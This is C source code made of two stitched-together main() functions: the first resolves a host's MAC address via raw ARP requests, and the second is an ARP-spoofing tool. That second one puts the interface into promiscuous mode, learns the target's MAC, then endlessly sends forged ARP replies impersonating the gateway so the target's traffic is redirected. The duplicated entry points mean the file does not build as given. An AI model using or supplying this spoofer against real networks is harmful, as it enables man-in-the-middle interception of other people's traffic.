int main(int c, char *z[])
{
errn1(packet_socket = socket(AF_PACKET, SOCK_RAW, rev2(ETH_P_ALL)), "open socket error");
struct sockaddr_ll sa_ll_b, sa_ll_s;
sa_ll_b.sll_family = sa_ll_s.sll_family = AF_PACKET;
sa_ll_b.sll_protocol = rev2(ETH_P_ALL), sa_ll_b.sll_ifindex = get_ifindex(packet_socket, net_if);
sa_ll_s.sll_halen = 0x06, sa_ll_s.sll_ifindex = get_ifindex(packet_socket, net_if), strcpy(sa_ll_s.sll_addr, "\xff\xff\xff\xff\xff\xff");
ok0(bind(packet_socket, (struct sockaddr*)&sa_ll_b, sizeof(struct sockaddr_ll)), "bind error");
char msg[1500+14];
int len = mk_arp_request_packet(msg, "\xcc\xcc\xcc\xcc\xcc\xcc", conv_ip("1.1.1.1"), conv_ip(z[1]));
semi a;
a.socket = packet_socket, a.len = len, a.msg = msg, a.sa_ll = &sa_ll_s;
pthread_t thread_info;
ok0(sem_init(&sem_info, 0, 0), "sem_init error");
ok0(pthread_create(&thread_info, NULL, send_eth_packet, (void*)&a), "pthread_create error");
f = set_promiscuous(packet_socket, net_if);
signal(SIGALRM, alarm_handler);
alarm(2);
while (1) {
ok0(sem_post(&sem_info), "sem_post error");
errn1(recvfrom(packet_socket, msg, 1514, 0, NULL, NULL), "recvfrom error");
if (*((short*)(msg+12)) == rev2(0x0806) && *((int*)(msg+28)) == conv_ip(z[1])) {
int i;
for (i=0;i<6;i++)
printf("%.2x%c", msg[22+i]&0xff, (i+1==6)?'\n':':');
if (f)
leave_promiscuous(packet_socket, net_if);
return 0;
}
}
}
int main(int argc, char *argv[])
{
if(argc != 3){
fprintf (stderr, "usage: %s <interface> <ip_target>\n", argv[0]);
exit(0);
}
// check if root
if (geteuid() || getuid()) {
printf("ERROR: You must be root to use this utility\n");
exit(1);
}
int sfd, len;
u_char *mac;
char recv_buf[60];
struct in_addr ip_addr;
struct sockaddr_ll sl;
struct arp_pkt{
struct ether_header eh;
struct ether_arp ea;
u_char padding[18];
}arp;
/*open sock_raw*/
if((sfd = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))) < 0){
perror("socket");
exit(2);
}
/*set_promiscuous mode*/
set_promiscuous(sfd, argv[1]);
/*get my ip and mac*/
mac = (char *)malloc(MAC_LEN);
if(get_ifi(sfd, argv[1], mac, &ip_addr)){
close(sfd);
exit(0);
}
memset(&arp, 0, sizeof(arp));
/* 填寫以太網頭部*/
memcpy(arp.eh.ether_dhost, MAC_BCAST_ADDR, MAC_LEN);
memcpy(arp.eh.ether_shost, mac, MAC_LEN);
arp.eh.ether_type = htons(ETHERTYPE_ARP);
/* 填寫arp數據 */
arp.ea.arp_hrd = htons(ARPHRD_ETHER);
arp.ea.arp_pro = htons(ETHERTYPE_IP);
arp.ea.arp_hln = MAC_LEN;
arp.ea.arp_pln = IP_LEN;
arp.ea.arp_op = htons(ARPOP_REQUEST);
memcpy(arp.ea.arp_sha, mac, MAC_LEN);
memcpy(arp.ea.arp_spa, &ip_addr, IP_LEN);
memset(&arp.ea.arp_tha, 0, MAC_LEN);
inet_aton(argv[2], arp.ea.arp_tpa);
memset(&arp.padding, 0, sizeof(arp.padding));
sl.sll_family = PF_PACKET;
sl.sll_ifindex = if_nametoindex(argv[1]);
if((len = sendto(sfd, &arp, sizeof(arp), 0, (struct sockaddr*)&sl, sizeof(sl))) <= 0 ){
perror("sendto request");
close(sfd);
exit(1);
}
printf("Broadcast arp request of %s, %d bytes be sent\n", argv[2], len);
memset(recv_buf, 0, sizeof(recv_buf));
if((len = recvfrom(sfd, recv_buf, sizeof(arp), 0, NULL, 0)) <= 0 ){
perror("recvfrom reply");
close(sfd);
exit(1);
}
printf("Recv arp reply of %s, %d bytes be sent\n", argv[2], len);
/*check arp is reply and from ip(argv[2])*/
if( ntohs(*(__be16 *)(recv_buf + 20))==2 && !memcmp(arp.ea.arp_tpa, recv_buf + 28, 4) ){
memcpy(arp.eh.ether_dhost, (u_char *)(recv_buf + 22), MAC_LEN);
arp.ea.arp_op = htons(ARPOP_REPLY);
inet_aton(GATEWAY, arp.ea.arp_spa);
memcpy(arp.ea.arp_tha, (u_char *)(recv_buf + 22), MAC_LEN);
while(1){
if((len = sendto(sfd, &arp, sizeof(arp), 0, (struct sockaddr*)&sl, sizeof(sl))) <= 0 ){
perror("sendto request");
close(sfd);
exit(1);
}
printf("Send arp spoofing to %s, %d bytes be sent\n", argv[2], len);
sleep(1);
}
}
free(mac);
close(sfd);
return 0;
}
